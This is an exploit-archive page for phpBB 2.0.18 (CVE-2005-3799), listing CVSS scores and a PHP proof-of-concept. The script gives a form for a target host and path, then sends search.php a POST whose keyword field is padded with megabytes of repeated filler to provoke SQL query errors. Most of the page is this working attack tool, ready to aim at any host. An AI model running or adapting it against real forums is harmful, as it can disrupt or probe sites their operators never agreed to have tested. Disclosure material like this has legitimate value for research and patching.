phpBB 2.0.18 sql query problem PoC

Published / (Updated)
Credit
Risk
2005-11-11 / 2005-09-30
Maksymilian Arciemowicz
Low
CWE
CVE
Local
Remote
N/A
CVE-2005-3799
No
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

<?
#
# phpBB2018 examples errors
# Maksymilian Arciemowicz
# cxib [at] cxsecurity [dot] com

if(isset($_POST['HOST']) AND isset($_POST['CAT']) AND isset($_POST['ILE'])){

$POSTx="SecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurityReasonComSecurity"; # 2048b

$POST = "mode=results&search_keywords=";

for($x=1; $x<=$_POST['ILE']; $x++){
$POST .= $POSTx; # f(x)=x * 2048b
}


$sock = fsockopen($_POST['HOST'], 80);
if (!$sock) {return false;}

$out = "POST ".$_POST['CAT']."search.php HTTP/1.1\r\n";
$out .= "Host: ".$_POST['HOST']."\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\n";
$out .= "Content-Length: ".strlen($POST)."\n\n";
$out .= $POST."\r\n";

fwrite($sock, $out);

$data="";
while(!feof($sock)) {
$data .= fread($sock,4096);
}

fclose($sock);
$data = substr($data, strpos($data,"\r\n\r\n")+4);

echo $data;

} else {

echo "<CENTER>
<A HREF=\"http://cxsecurity.com\"><IMG SRC=\"http://cxsecurity.com/gfx/small_log
o.png\"></A><P>
<FORM action=\"\" method=post enctype=\"multipart/form-data\">
HOST: <input TYPE=\"text\" name=\"HOST\"> Like www.cxsecurity.com<br>
CATALOG: <input TYPE=\"text\" name=\"CAT\"> Like: /phpBB2/<br>
f(x)= <input TYPE=\"text\" name=\"ILE\" value=\"512\"> x 2048b (example 512 x 2048)<br>
<input TYPE=\"submit\" value=\"Send\">
</FORM>";

}
?>

References:

http://cxsecurity.com/issue/WLB-2005090050


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com